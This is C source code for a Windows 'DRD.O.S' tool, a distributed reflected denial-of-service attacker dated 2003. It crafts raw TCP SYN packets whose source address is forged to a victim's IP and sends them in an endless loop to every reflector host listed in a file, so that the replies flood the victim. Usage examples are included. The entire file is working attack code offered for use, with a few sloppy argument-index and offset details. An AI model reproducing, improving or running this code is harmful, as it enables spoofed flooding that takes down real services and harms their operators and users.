///////////////////////////////////////////////////////
/// DRD.O.S Tool
/// http://www.safechina.net
/// Written by CDrea
/// 2003-01-31
///
/// If u add some function, Please give me a copy
/// mailto: [email protected]
///////////////////////////////////////////////////////
#include <stdio.h>
#include <string.h>
#include <Winsock2.h>
#include <Ws2tcpip.h>
#pragma comment(lib,"ws2_32")
#define HOST_LEN 15
#define SEQ 0x28376839
#define TCP_SERVER_PORT 80
#define FAKE_PORT 80
#define STATUS_FAILED 0xFFFF
typedef struct _iphdr
{
unsigned char h_lenver;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER, * PIP_HEADER;
typedef struct _tcphdr
{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
}TCP_HEADER, * PTCP_HEADER;
struct
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}psd_header;
int SendThread(int argc, char * argv[], char * destIp);
void Usage(char *);
void GetCMD(int argc, char * argv[]);
USHORT checksum(USHORT * buffer, int size);
int main(int argc, char * argv[])
{
WSADATA wsaData;
int ErrorCode;
if(argc < 2 || argc > 6)
{
Usage(argv[0]);
ExitProcess(STATUS_FAILED);
}
if((ErrorCode=WSAStartup(MAKEWORD(2, 1), &wsaData))!=0)
{
fprintf(stderr, "WSAStartup failed: %d\n", ErrorCode);
ExitProcess(STATUS_FAILED);
}
ErrorCode = SendThread(argc, argv, argv[1]);
if(ErrorCode != 0)
{
fprintf(stderr, "Thread failed: %d\n", ErrorCode);
ExitProcess(STATUS_FAILED);
}
return 0;
}
int SendThread(int argc, char * argv[], char * destIP)
{
int TimeOut=2000, ErrorCode, flag, i=0;
char SendBuff[128];
char HostName[HOST_LEN];
char ch;
FILE * fp;
SOCKET SendSock;
struct sockaddr_in DestAddr;
IP_HEADER IpHeader;
TCP_HEADER TcpHeader;
if((fp=fopen("iplist.txt", "r")) == NULL)
{
printf("Error: File not found!\n");
return -1;
}
SendSock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED);
if(SendSock == INVALID_SOCKET)
{
fprintf(stderr, "socket failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
flag = true;
ErrorCode = setsockopt(SendSock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
if(ErrorCode == SOCKET_ERROR)
{
fprintf(stderr, "set IP_HDRINCL failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
__try
{
if(argc > 4)
TimeOut = atoi(argv[3]);
ErrorCode = setsockopt(SendSock, SOL_SOCKET, SO_SNDTIMEO, (char *)&TimeOut,
sizeof(TimeOut));
if(ErrorCode == SOCKET_ERROR)
{
fprintf(stderr, "set TimeOut failed: %d\n", GetLastError());
__leave;
}
DestAddr.sin_family = AF_INET;
// DestAddr.sin_addr.s_addr = inet_addr(SERVER);
if(argc > 3)
DestAddr.sin_port = htons(atoi(argv[3]));
else
DestAddr.sin_port = htons(TCP_SERVER_PORT);
IpHeader.h_lenver = (4<<4 | sizeof(IpHeader)/sizeof(unsigned long));
IpHeader.tos = 0;
IpHeader.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
IpHeader.ident = 1;
IpHeader.frag_and_flags = 0;
IpHeader.ttl = 128;
IpHeader.proto = IPPROTO_TCP;
IpHeader.checksum = 0;
IpHeader.sourceIP = inet_addr(destIP);
IpHeader.destIP = inet_addr("0.0.0.0");
if(argc > 2)
TcpHeader.th_sport = htons(atoi(argv[2]));
else
TcpHeader.th_sport = htons(FAKE_PORT);
if(argc > 3)
TcpHeader.th_dport = htons(atoi(argv[3]));
else
TcpHeader.th_dport = htons(TCP_SERVER_PORT);
TcpHeader.th_seq = htonl(SEQ);
TcpHeader.th_ack = 0;
TcpHeader.th_lenres = (sizeof(TCP_HEADER)/4<<4|0);
TcpHeader.th_flag = 2;
TcpHeader.th_win = htons(16384);
TcpHeader.th_urp = 0;
TcpHeader.th_sum = 0;
psd_header.saddr = IpHeader.sourceIP;
psd_header.daddr = IpHeader.destIP;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(TCP_HEADER));
/* memcpy(SendBuff, &psd_header, sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));
TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);
IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER)); */
printf("Send Packets\n");
int Packets = 0;
ch = fgetc(fp);
GetCMD(argc, argv);
while(1)
{
if(ch == '\n' || ch == EOF)
{
HostName[i] = '\0';
// Add your code here-----------------------
DestAddr.sin_addr.s_addr = inet_addr(HostName);
IpHeader.destIP = inet_addr(HostName);
IpHeader.checksum = 0;
psd_header.daddr = IpHeader.destIP;
TcpHeader.th_seq = htonl(SEQ);
TcpHeader.th_sum = 0;
memcpy(SendBuff, &psd_header, sizeof(psd_header));
memcpy(SendBuff+sizeof(psd_header), &TcpHeader, sizeof(TCP_HEADER));
TcpHeader.th_sum = checksum((USHORT *)SendBuff, sizeof(psd_header)+sizeof(TcpHeader));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, 4);
IpHeader.checksum = checksum((USHORT *)SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER));
memcpy(SendBuff, &IpHeader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(TCP_HEADER), &TcpHeader, sizeof(TCP_HEADER));
Packets++;
if(Packets == 10240)
{
printf(".");
Packets = 1;
}
ErrorCode = sendto(SendSock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0,
(struct sockaddr *)&DestAddr, sizeof(DestAddr));
// printf("->%s\n", HostName);
//----------------------------
i = 0;
ch = fgetc(fp);
if(ch == EOF)
{
// i = 0;
rewind(fp);
// memset(HostName, 0, sizeof(HostName));
}
}
HostName[i] = ch;
i++;
ch = fgetc(fp);
}
}
__finally
{
if(SendSock == INVALID_SOCKET)
closesocket(SendSock);
WSACleanup();
}
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void Usage(char * msg)
{
printf("+-----------------------------+\n");
printf("| DRD.O.S Tool v0.3 |\n");
printf("| |\n");
printf("| http://www.safechina.net |\n");
printf("+-----------------------------+\n");
printf("USAGE:\n");
printf(" %s DestIP [DestPort] [TcpServerPort] [TimeOut]\n", msg);
printf("EXAMPLE:\n");
printf(" %s 192.168.0.1\n", msg);
printf(" %s 192.168.0.1 80\n", msg);
printf(" %s 192.168.0.1 80 170 \n", msg);
printf(" %s 192.168.0.1 80 170 2000\n", msg);
}
void GetCMD(int argc, char * argv[])
{
printf("<------------------------>\n");
printf(" Target: %s\n", argv[2]);
if(argc > 3)
printf(" Target Port: %d\n", atoi(argv[3]));
if(argc > 4)
printf(" TCP Server Port: %d\n", atoi(argv[4]));
if(argc > 5)
printf(" Timeout: %d\n", atoi(argv[5]));
printf("<------------------------>\n");
}